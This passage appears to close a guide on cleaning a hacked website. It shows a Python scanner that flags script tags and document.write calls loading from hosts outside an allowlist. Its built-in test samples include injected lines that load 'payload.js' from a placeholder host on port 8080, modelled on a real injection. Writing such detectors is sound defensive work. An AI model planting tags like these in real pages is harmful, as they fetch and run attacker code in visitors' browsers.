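            findings.extend(check_text(str(path.relative_to(root)), text, allowed_hosts))
    return findings


# Constructed samples mirroring the two injection shapes in the post
# (hosts under .example are placeholders, not the domains from the incident).
ALLOWED = {"www.mysite.example"}
SAMPLE_JS = (
    "function menu() { return 1; }\n"
    "document.write('<script src=\"http://injected.example:8080/payload.js\"></script>');\n"
)
SAMPLE_HTML = (
    "<html><head>\n"
    '<script type="text/javascript" src="/js/menu.js"></script>\n'
    '<script type="text/javascript" src="http://www.mysite.example/js/site.js"></script>\n'
    "</head><body>hello\n"
    '<script type="text/javascript" src="http://injected.example:8080/payload.js"></script>\n'
    "</body></html>\n"
)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        Path(d, "menu.js").write_text(SAMPLE_JS)
        Path(d, "index.html").write_text(SAMPLE_HTML)
        for f in scan_tree(d, ALLOWED):
            flag = " [non-standard port]" if f.odd_port else ""
            print(f"{f.file}:{f.line}: {f.how} loads {f.url}{flag}")
```

Run it against a downloaded copy of the web root before and after restoring files; an empty result after cleanup means no listed file type still references a script host outside the allowlist.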